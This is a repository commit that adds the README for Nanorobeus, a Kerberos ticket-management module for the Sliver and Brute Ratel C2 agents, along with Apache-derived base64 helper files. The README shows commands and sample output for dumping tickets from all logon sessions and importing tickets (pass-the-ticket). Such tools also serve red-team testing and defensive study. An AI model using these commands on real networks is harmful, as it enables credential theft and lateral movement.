-
wavvs committed 2 years ago
-
-
1 + # Nanorobeus 2 + COFF file (BOF) for managing Kerberos tickets. 3 + 4 + ## Supported agents 5 + * [Sliver](https://github.com/BishopFox/sliver) 6 + * [Brute Ratel](https://bruteratel.com) 7 + 8 + ## Commands 9 + 10 + **luid** - get current logon ID 11 + 12 + **sessions** *[/luid <0x0>| /all]* - get logon sessions 13 + 14 + **klist** *[/luid <0x0> | /all]* - list Kerberos tickets 15 + 16 + **dump** *[/luid <0x0> | /all]* - dump Kerberos tickets 17 + 18 + **ptt** *\<base64\> [/luid <0x0>]* - import Kerberos ticket into a logon session 19 + 20 + **purge** [/luid <0x0>] - purge Kerberos tickets 21 + 22 + ## Examples 23 + Get current logon ID. 24 + ``` 25 + => nanorobeus64 luid 26 + 27 + [+] Current LogonId: 0:0x19ea88e 28 + ``` 29 + Get detailed information about the current logon session. 30 + ``` 31 + => nanorobeus64 sessions 32 + 33 + UserName : User 34 + Domain : FORTRESS 35 + LogonId : 0:0x19ea88e 36 + Session : 2 37 + UserSID : S-1-5-21-1768674056-2740991423-664180583-1105 38 + Authentication package : Kerberos 39 + LogonType : Interactive 40 + LogonTime (UTC) : 2/7/2022 19:22:43 41 + LogonServer : SERVER 42 + LogonServerDNSDomain : FORTRESS.LOCAL 43 + UserPrincipalName : [email protected] 44 + ``` 45 + List Kerberos tickets for the current logon session. When elevated, use `/all` to list tickets from all of the sessions or `/luid 0x0` to list tickets in a specified logon session. 46 + ``` 47 + => nanorobeus64 klist 48 + 49 + UserName : User 50 + Domain : FORTRESS 51 + LogonId : 0:0x19ea88e 52 + Session : 2 53 + UserSID : S-1-5-21-1768674056-2740991423-664180583-1105 54 + Authentication package : Kerberos 55 + LogonType : Interactive 56 + LogonTime (UTC) : 2/7/2022 19:22:43 57 + LogonServer : SERVER 58 + LogonServerDNSDomain : FORTRESS.LOCAL 59 + UserPrincipalName : [email protected] 60 + 61 + [*] Cached tickets: (6) 62 + 63 + [0] 64 + Client name : User @ FORTRESS.LOCAL 65 + Server name : krbtgt/FORTRESS.LOCAL @ FORTRESS.LOCAL 66 + Start time : 2/7/2022 19:22:44 (UTC) 67 + End time : 3/7/2022 5:22:43 (UTC) 68 + Renew time : 9/7/2022 19:22:43 (UTC) 69 + Flags : forwardable, forwarded, renewable, pre_authent, name_canonicalize (0x60a10000) 70 + Encryption type : AES256_CTS_HMAC_SHA1 71 + ...(snip)... 72 + ``` 73 + Dump tickets from the current logon session. When elevated, use `/all` to dump tickets from all of the sessions or `/luid 0x0` to dump tickets from a specified logon session. 74 + ``` 75 + => nanorobeus64 dump 76 + 77 + UserName : User 78 + Domain : FORTRESS 79 + LogonId : 0:0x19ea88e 80 + Session : 2 81 + UserSID : S-1-5-21-1768674056-2740991423-664180583-1105 82 + Authentication package : Kerberos 83 + LogonType : Interactive 84 + LogonTime (UTC) : 2/7/2022 19:22:43 85 + LogonServer : SERVER 86 + LogonServerDNSDomain : FORTRESS.LOCAL 87 + UserPrincipalName : [email protected] 88 + 89 + [*] Cached tickets: (6) 90 + 91 + [0] 92 + Client name : User @ FORTRESS.LOCAL 93 + Server name : krbtgt/FORTRESS.LOCAL @ FORTRESS.LOCAL 94 + Start time : 2/7/2022 19:22:44 (UTC) 95 + End time : 3/7/2022 5:22:43 (UTC) 96 + Renew time : 9/7/2022 19:22:43 (UTC) 97 + Flags : forwardable, forwarded, renewable, pre_authent, name_canonicalize (0x60a10000) 98 + Encryption type : AES256_CTS_HMAC_SHA1 99 + Ticket : doIFFjCCBRKgAwIBBaEDAgEWooIEGTCCBBVhggQRMIIEDaADAg...(snip)... 100 + ``` 101 + Import a ticket into the current logon session. When elevated, use `/luid 0x0` to import the ticket into a specified logon session. 102 + ``` 103 + => make_token network fortress.local test pass 104 + => nanorobeus64 ptt doIFqjCCBaagAwIB...snip... 105 + 106 + [+] Ticket successfully imported. 107 + ``` 108 + Purge all Kerberos tickets from the current logon session. When elevated, use `/luid 0x0` to purge the tickets from a specified logon session. 109 + ``` 110 + => nanorobeus64 purge 111 + 112 + [+] Successfully purged tickets. 113 + ``` 114 + 115 + ## Credits 116 + * Rubeus - https://github.com/GhostPack/Rubeus 117 + * mimikatz - https://github.com/gentilkiwi/mimikatz -
1 + /* 2 + * Copyright (c) 2003 Apple Computer, Inc. All rights reserved. 3 + * 4 + * @APPLE_LICENSE_HEADER_START@ 5 + * 6 + * Copyright (c) 1999-2003 Apple Computer, Inc. All Rights Reserved. 7 + * 8 + * This file contains Original Code and/or Modifications of Original Code 9 + * as defined in and that are subject to the Apple Public Source License 10 + * Version 2.0 (the 'License'). You may not use this file except in 11 + * compliance with the License. Please obtain a copy of the License at 12 + * http://www.opensource.apple.com/apsl/ and read it before using this 13 + * file. 14 + * 15 + * The Original Code and all software distributed under the License are 16 + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 17 + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 18 + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 19 + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 20 + * Please see the License for the specific language governing rights and 21 + * limitations under the License. 22 + * 23 + * @APPLE_LICENSE_HEADER_END@ 24 + */ 25 + /* ==================================================================== 26 + * Copyright (c) 1995-1999 The Apache Group. All rights reserved. 27 + * 28 + * Redistribution and use in source and binary forms, with or without 29 + * modification, are permitted provided that the following conditions 30 + * are met: 31 + * 32 + * 1. Redistributions of source code must retain the above copyright 33 + * notice, this list of conditions and the following disclaimer. 34 + * 35 + * 2. Redistributions in binary form must reproduce the above copyright 36 + * notice, this list of conditions and the following disclaimer in 37 + * the documentation and/or other materials provided with the 38 + * distribution. 39 + * 40 + * 3. All advertising materials mentioning features or use of this 41 + * software must display the following acknowledgment: 42 + * "This product includes software developed by the Apache Group 43 + * for use in the Apache HTTP server project (http://www.apache.org/)." 44 + * 45 + * 4. The names "Apache Server" and "Apache Group" must not be used to 46 + * endorse or promote products derived from this software without 47 + * prior written permission. For written permission, please contact 48 + * [email protected]. 49 + * 50 + * 5. Products derived from this software may not be called "Apache" 51 + * nor may "Apache" appear in their names without prior written 52 + * permission of the Apache Group. 53 + * 54 + * 6. Redistributions of any form whatsoever must retain the following 55 + * acknowledgment: 56 + * "This product includes software developed by the Apache Group 57 + * for use in the Apache HTTP server project (http://www.apache.org/)." 58 + * 59 + * THIS SOFTWARE IS PROVIDED BY THE APACHE GROUP ``AS IS'' AND ANY 60 + * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 61 + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 62 + * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE APACHE GROUP OR 63 + * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 64 + * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 65 + * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 66 + * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 67 + * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 68 + * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 69 + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED 70 + * OF THE POSSIBILITY OF SUCH DAMAGE. 71 + * ==================================================================== 72 + * 73 + * This software consists of voluntary contributions made by many 74 + * individuals on behalf of the Apache Group and was originally based 75 + * on public domain software written at the National Center for 76 + * Supercomputing Applications, University of Illinois, Urbana-Champaign. 77 + * For more information on the Apache Group and the Apache HTTP server 78 + * project, please see <http://www.apache.org/>. 79 + * 80 + */ 81 + 82 + #pragma once 83 + 84 + int Base64encode_len(int len); 85 + int Base64encode(char* coded_dst, const char* plain_src, int len_plain_src); 86 + 87 + int Base64decode_len(const char* coded_src); 88 + int Base64decode(char* plain_dst, const char* coded_src); 89 + -
-
-
-
-
-
-
-
1 + /* 2 + * Copyright (c) 2003 Apple Computer, Inc. All rights reserved. 3 + * 4 + * @APPLE_LICENSE_HEADER_START@ 5 + * 6 + * Copyright (c) 1999-2003 Apple Computer, Inc. All Rights Reserved. 7 + * 8 + * This file contains Original Code and/or Modifications of Original Code 9 + * as defined in and that are subject to the Apple Public Source License 10 + * Version 2.0 (the 'License'). You may not use this file except in 11 + * compliance with the License. Please obtain a copy of the License at 12 + * http://www.opensource.apple.com/apsl/ and read it before using this 13 + * file. 14 + * 15 + * The Original Code and all software distributed under the License are 16 + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 17 + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 18 + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 19 + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 20 + * Please see the License for the specific language governing rights and 21 + * limitations under the License. 22 + * 23 + * @APPLE_LICENSE_HEADER_END@ 24 + */ 25 + /* ==================================================================== 26 + * Copyright (c) 1995-1999 The Apache Group. All rights reserved. 27 + * 28 + * Redistribution and use in source and binary forms, with or without 29 + * modification, are permitted provided that the following conditions 30 + * are met: 31 + * 32 + * 1. Redistributions of source code must retain the above copyright 33 + * notice, this list of conditions and the following disclaimer. 34 + * 35 + * 2. Redistributions in binary form must reproduce the above copyright 36 + * notice, this list of conditions and the following disclaimer in 37 + * the documentation and/or other materials provided with the 38 + * distribution. 39 + * 40 + * 3. All advertising materials mentioning features or use of this 41 + * software must display the following acknowledgment: 42 + * "This product includes software developed by the Apache Group 43 + * for use in the Apache HTTP server project (http://www.apache.org/)." 44 + * 45 + * 4. The names "Apache Server" and "Apache Group" must not be used to 46 + * endorse or promote products derived from this software without 47 + * prior written permission. For written permission, please contact 48 + * [email protected]. 49 + * 50 + * 5. Products derived from this software may not be called "Apache" 51 + * nor may "Apache" appear in their names without prior written 52 + * permission of the Apache Group. 53 + * 54 + * 6. Redistributions of any form whatsoever must retain the following 55 + * acknowledgment: 56 + * "This product includes software developed by the Apache Group 57 + * for use in the Apache HTTP server project (http://www.apache.org/)." 58 + * 59 + * THIS SOFTWARE IS PROVIDED BY THE APACHE GROUP ``AS IS'' AND ANY 60 + * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 61 + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 62 + * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE APACHE GROUP OR 63 + * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 64 + * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 65 + * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 66 + * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 67 + * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 68 + * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 69 + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED 70 + * OF THE POSSIBILITY OF SUCH DAMAGE. 71 + * ==================================================================== 72 + * 73 + * This software consists of voluntary contributions made by many 74 + * individuals on behalf of the Apache Group and was originally based 75 + * on public domain software written at the National Center for 76 + * Supercomputing Applications, University of Illinois, Urbana-Champaign. 77 + * For more information on the Apache Group and the Apache HTTP server 78 + * project, please see <http://www.apache.org/>. 79 + * 80 + */ 81 + 82 + /* Base64 encoder/decoder. Originally Apache file ap_base64.c 83 + */ 84 + 85 + #include <string.h> 86 + 87 + #include "base64.h" 88 + 89 + /* aaaack but it's fast and const should make it shared text page. */ 90 + static const unsigned char pr2six[256] = { 91 + /* ASCII table */ 92 + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 93 + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 94 + 64, 64, 64, 64, 64, 64, 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 95 + 22, 23, 24, 25, 64, 64, 64, 64, 64, 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 96 + 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 97 + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 98 + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 99 + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 100 + 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64}; 101 + 102 + int Base64decode_len(const char* bufcoded) { 103 + int nbytesdecoded; 104 + const unsigned char* bufin; 105 + int nprbytes; 106 + 107 + bufin = (const unsigned char*)bufcoded; 108 + while (pr2six[*(bufin++)] <= 63) 109 + ; 110 + 111 + nprbytes = (bufin - (const unsigned char*)bufcoded) - 1; 112 + nbytesdecoded = ((nprbytes + 3) / 4) * 3; 113 + 114 + return nbytesdecoded + 1; 115 + } 116 + 117 + int Base64decode(char* bufplain, const char* bufcoded) { 118 + int nbytesdecoded; 119 + const unsigned char* bufin; 120 + unsigned char* bufout; 121 + int nprbytes; 122 + 123 + bufin = (const unsigned char*)bufcoded; 124 + while (pr2six[*(bufin++)] <= 63) 125 + ; 126 + nprbytes = (bufin - (const unsigned char*)bufcoded) - 1; 127 + nbytesdecoded = ((nprbytes + 3) / 4) * 3; 128 + 129 + bufout = (unsigned char*)bufplain; 130 + bufin = (const unsigned char*)bufcoded; 131 + 132 + while (nprbytes > 4) { 133 + *(bufout++) = (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); 134 + *(bufout++) = (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); 135 + *(bufout++) = (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); 136 + bufin += 4; 137 + nprbytes -= 4; 138 + } 139 + 140 + /* Note: (nprbytes == 1) would be an error, so just ingore that case */ 141 + if (nprbytes > 1) { 142 + *(bufout++) = (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); 143 + } 144 + if (nprbytes > 2) { 145 + *(bufout++) = (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); 146 + } 147 + if (nprbytes > 3) { 148 + *(bufout++) = (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); 149 + } 150 + 151 + *(bufout++) = '\0'; 152 + nbytesdecoded -= (4 - nprbytes) & 3; 153 + return nbytesdecoded; 154 + } 155 + 156 + static const char basis_64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 157 + 158 + int Base64encode_len(int len) { return ((len + 2) / 3 * 4) + 1; } 159 + 160 + int Base64encode(char* encoded, const char* string, int len) { 161 + int i; 162 + char* p; 163 + 164 + p = encoded; 165 + for (i = 0; i < len - 2; i += 3) { 166 + *p++ = basis_64[(string[i] >> 2) & 0x3F]; 167 + *p++ = basis_64[((string[i] & 0x3) << 4) | ((int)(string[i + 1] & 0xF0) >> 4)]; 168 + *p++ = basis_64[((string[i + 1] & 0xF) << 2) | ((int)(string[i + 2] & 0xC0) >> 6)]; 169 + *p++ = basis_64[string[i + 2] & 0x3F]; 170 + } 171 + if (i < len) { 172 + *p++ = basis_64[(string[i] >> 2) & 0x3F]; 173 + if (i == (len - 1)) { 174 + *p++ = basis_64[((string[i] & 0x3) << 4)]; 175 + *p++ = '='; 176 + } else { 177 + *p++ = basis_64[((string[i] & 0x3) << 4) | ((int)(string[i + 1] & 0xF0) >> 4)]; 178 + *p++ = basis_64[((string[i + 1] & 0xF) << 2)]; 179 + } 180 + *p++ = '='; 181 + } 182 + 183 + *p++ = '\0'; 184 + return p - encoded; 185 + } 186 + -
-
-
-
-
-
-